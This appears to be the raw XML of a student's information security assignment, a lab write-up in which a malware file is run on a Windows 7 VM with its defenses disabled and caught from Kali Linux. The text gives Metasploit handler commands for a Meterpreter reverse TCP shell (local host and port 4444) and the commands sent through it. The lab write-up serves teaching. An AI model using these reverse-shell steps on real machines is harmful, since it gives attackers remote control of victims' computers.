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C94" w:rsidRDefault="003C0023" w:rsidP="00203DCD">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Information Security – 7H</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00E10A8C" w:rsidRPr="00E10A8C" w:rsidRDefault="00E10A8C" w:rsidP="00E10A8C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E10A8C">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Assignment 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00203DCD" w:rsidRPr="003C0023" w:rsidRDefault="006A5F71" w:rsidP="00203DCD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C0023">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Humza Noor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00203DCD" w:rsidRPr="003C0023" w:rsidRDefault="00203DCD" w:rsidP="00203DCD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C0023">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>19L-2375</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00203DCD" w:rsidRPr="00203DCD" w:rsidRDefault="00203DCD" w:rsidP="00203DCD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00203DCD">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Malware Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C0023" w:rsidRDefault="003C0023" w:rsidP="00203DCD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C0023" w:rsidRDefault="003C0023" w:rsidP="00203DCD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00203DCD" w:rsidRDefault="00203DCD" w:rsidP="00203DCD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00203DCD">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Logging in:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00203DCD" w:rsidRDefault="00203DCD" w:rsidP="00203DCD">
      <w:r>
        <w:t>The first step is of course signing in to our Kali Linux Virtual machine on VMware using the correct credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00203DCD" w:rsidRPr="00203DCD" w:rsidRDefault="00A80686" w:rsidP="00203DCD">
      <w:r w:rsidRPr="00A80686">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ADD41A9" wp14:editId="15E1989F">
            <wp:extent cx="5943600" cy="3086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6735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00203DCD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80686" w:rsidRDefault="00A80686" w:rsidP="00203DCD"/>
    <w:p w:rsidR="00203DCD" w:rsidRDefault="00A80686" w:rsidP="00203DCD">
      <w:r>
        <w:t>Root Access and verification:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80686" w:rsidRDefault="00A80686" w:rsidP="00203DCD">
      <w:r>
        <w:t>We must ensure that our account has root access and we are using the correct tools.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA1D7D" w:rsidRDefault="00CA1D7D" w:rsidP="00CA1D7D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA1D7D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57FD8E23" wp14:editId="46802A8D">
            <wp:extent cx="5943600"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3720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA1D7D" w:rsidRDefault="00CA1D7D" w:rsidP="00CA1D7D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CA1D7D" w:rsidRDefault="00CA1D7D" w:rsidP="00CA1D7D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CA1D7D" w:rsidRDefault="00EC542E" w:rsidP="00EC542E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Changing IP Addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC542E" w:rsidRDefault="00EC542E" w:rsidP="00EC542E">
      <w:r>
        <w:t xml:space="preserve">We must now change the IPs in both VMs: Linux and Windows, in order to allow communication between them. </w:t>
      </w:r>
      <w:r w:rsidR="00151E7F">
        <w:t>192.168.10.1</w:t>
      </w:r>
      <w:r w:rsidR="000D218F">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00151E7F">
        <w:t xml:space="preserve"> shall be the IP for our Kali Linux. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A37BFE" w:rsidRDefault="00A37BFE" w:rsidP="00EC542E">
      <w:r w:rsidRPr="00A37BFE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="299CD1DB" wp14:editId="4667A488">
            <wp:extent cx="5943600" cy="2795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5905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00151E7F" w:rsidRDefault="00151E7F" w:rsidP="00EC542E"/>
    <w:p w:rsidR="00151E7F" w:rsidRDefault="00151E7F" w:rsidP="00EC542E">
      <w:r>
        <w:t>While</w:t>
      </w:r>
      <w:r w:rsidR="000D218F">
        <w:t>, we will be using 192.168.10.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for the Windows 7 Virtual machine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00151E7F" w:rsidRDefault="00151E7F" w:rsidP="00EC542E"/>
    <w:p w:rsidR="00A37BFE" w:rsidRDefault="00A37BFE" w:rsidP="00EC542E">
      <w:r w:rsidRPr="00A37BFE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="263593D5" wp14:editId="139AF067">
            <wp:extent cx="5943600" cy="2780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0030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A37BFE" w:rsidRDefault="00A37BFE" w:rsidP="00EC542E"/>
    <w:p w:rsidR="00A37BFE" w:rsidRDefault="00A37BFE" w:rsidP="00A37BFE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Malware Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A37BFE" w:rsidRPr="00A37BFE" w:rsidRDefault="00A37BFE" w:rsidP="00A37BFE">
      <w:r>
        <w:t xml:space="preserve">The Malware is then allowed to run on the Windows 7 VM, by disabling its defenses. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A37BFE" w:rsidRDefault="00A37BFE" w:rsidP="00EC542E"/>
    <w:p w:rsidR="00A37BFE" w:rsidRDefault="00A37BFE" w:rsidP="00EC542E">
      <w:r w:rsidRPr="00A37BFE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F1E1CA0" wp14:editId="5A3564EB">
            <wp:extent cx="5943600" cy="2775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5585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A37BFE" w:rsidRDefault="00A37BFE" w:rsidP="00EC542E"/>
    <w:p w:rsidR="00A37BFE" w:rsidRDefault="00A37BFE" w:rsidP="00EC542E"/>
    <w:p w:rsidR="00A37BFE" w:rsidRDefault="00A37BFE" w:rsidP="00EC542E"/>
    <w:p w:rsidR="00A37BFE" w:rsidRDefault="00A37BFE" w:rsidP="00EC542E"/>
    <w:p w:rsidR="00055D9C" w:rsidRDefault="00DA0C7A" w:rsidP="003F6562">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Connecting the </w:t>
      </w:r>
      <w:r w:rsidR="00055D9C" w:rsidRPr="00055D9C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Malware from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali </w:t>
      </w:r>
      <w:r w:rsidR="00055D9C" w:rsidRPr="00055D9C">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F6562" w:rsidRPr="003F6562" w:rsidRDefault="003F6562" w:rsidP="003F6562"/>
    <w:p w:rsidR="00055D9C" w:rsidRDefault="00055D9C" w:rsidP="00055D9C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Msf6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F6562" w:rsidRDefault="003F6562" w:rsidP="00055D9C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003F6562" w:rsidRPr="00055D9C" w:rsidRDefault="003F6562" w:rsidP="00055D9C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Followed By:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00055D9C" w:rsidRPr="00055D9C" w:rsidRDefault="00055D9C" w:rsidP="00055D9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>exploit/multi/handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00055D9C" w:rsidRPr="00055D9C" w:rsidRDefault="00055D9C" w:rsidP="00055D9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, </w:t>
      </w:r>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>set payload windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00055D9C" w:rsidRPr="00055D9C" w:rsidRDefault="00055D9C" w:rsidP="00055D9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.10.17 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00055D9C" w:rsidRPr="00055D9C" w:rsidRDefault="00055D9C" w:rsidP="00055D9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A37BFE" w:rsidRPr="00055D9C" w:rsidRDefault="00055D9C" w:rsidP="00055D9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00055D9C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A37BFE" w:rsidRDefault="00A37BFE" w:rsidP="00055D9C"/>
    <w:p w:rsidR="00A37BFE" w:rsidRDefault="003F6562" w:rsidP="00EC542E">
      <w:r w:rsidRPr="003F6562">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40B5225F" wp14:editId="58D935B0">
            <wp:extent cx="5943600" cy="299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5295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A37BFE" w:rsidRPr="00EC542E" w:rsidRDefault="00A37BFE" w:rsidP="00EC542E"/>
    <w:p w:rsidR="003F6562" w:rsidRPr="00D03C82" w:rsidRDefault="003F6562" w:rsidP="00203DCD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D03C82">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">After running the malware in the Windows 7 VM: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F6562" w:rsidRPr="00D03C82" w:rsidRDefault="003F6562" w:rsidP="003F6562">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D03C82">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux will get the Windows shell access. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80686" w:rsidRPr="00D03C82" w:rsidRDefault="003F6562" w:rsidP="003F6562">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D03C82">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Using “help” command, we can see the operations that can be performed on the Windows host with the deployed malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D42B1" w:rsidRDefault="004D42B1" w:rsidP="00203DCD"/>
    <w:p w:rsidR="004D42B1" w:rsidRDefault="00207EFB" w:rsidP="00203DCD">
      <w:r w:rsidRPr="00207EFB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="526F2E66" wp14:editId="7A7A7E06">
            <wp:extent cx="594360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5770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E0A3C" w:rsidRDefault="003E0A3C" w:rsidP="00203DCD"/>
    <w:p w:rsidR="00DA2222" w:rsidRDefault="00DA2222" w:rsidP="003931E2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA2222" w:rsidRDefault="00DA2222" w:rsidP="003931E2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003931E2" w:rsidRPr="00795448" w:rsidRDefault="003931E2" w:rsidP="003931E2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Passing the Commands from Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00795448" w:rsidRPr="00DA2222" w:rsidRDefault="00795448" w:rsidP="003931E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2222">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We have passed the following commands to the malware: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00795448" w:rsidRPr="00DA2222" w:rsidRDefault="00795448" w:rsidP="003931E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2222">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA2222">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA2222">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00795448" w:rsidRPr="00DA2222" w:rsidRDefault="00795448" w:rsidP="003931E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2222">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA2222">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA2222">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003931E2" w:rsidRPr="00DA2222" w:rsidRDefault="00795448" w:rsidP="003931E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2222">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA2222">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>localtime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="003931E2" w:rsidRDefault="003931E2" w:rsidP="00203DCD"/>
    <w:p w:rsidR="003E0A3C" w:rsidRDefault="00207EFB" w:rsidP="00203DCD">
      <w:r w:rsidRPr="00207EFB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F900C8F" wp14:editId="33DEBD3B">
            <wp:extent cx="5943600" cy="26911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1130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0066497A" w:rsidRDefault="0066497A" w:rsidP="00203DCD"/>
    <w:p w:rsidR="00373FEC" w:rsidRDefault="00373FEC" w:rsidP="00203DCD"/>
    <w:p w:rsidR="00373FEC" w:rsidRDefault="00373FEC" w:rsidP="00373FEC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Detecting the malware from Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373FEC" w:rsidRPr="00373FEC" w:rsidRDefault="00373FEC" w:rsidP="00373FEC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E0A3C" w:rsidRDefault="0066497A" w:rsidP="00203DCD">
      <w:r>
        <w:t>Meanwhile, programs are running well on the windows 7 VM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA2222" w:rsidRDefault="006F6EE0" w:rsidP="00203DCD">
      <w:r w:rsidRPr="006F6EE0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ED2F809" wp14:editId="564B5847">
            <wp:extent cx="4686954" cy="288647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886478"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA2222" w:rsidRDefault="00DA2222" w:rsidP="00203DCD"/>
    <w:p w:rsidR="006F6EE0" w:rsidRDefault="006F6EE0" w:rsidP="00203DCD">
      <w:r>
        <w:t xml:space="preserve">Among the processes listed above, textex.exe, our malware file has the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProcessID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2096. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E0A3C" w:rsidRDefault="006F6EE0" w:rsidP="00203DCD">
      <w:r w:rsidRPr="006F6EE0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="562EBF37" wp14:editId="451E579F">
            <wp:extent cx="5382376" cy="28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376" cy="285790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E0A3C" w:rsidRDefault="003E0A3C" w:rsidP="00203DCD"/>
    <w:p w:rsidR="00E40FC7" w:rsidRDefault="00E40FC7" w:rsidP="00203DCD">
      <w:r>
        <w:t>The malware is also running well on the Windows Task manager.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E40FC7" w:rsidRDefault="00E40FC7" w:rsidP="00203DCD">
      <w:r w:rsidRPr="00E40FC7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72591923" wp14:editId="5569643F">
            <wp:extent cx="5582429" cy="261974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2619741"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
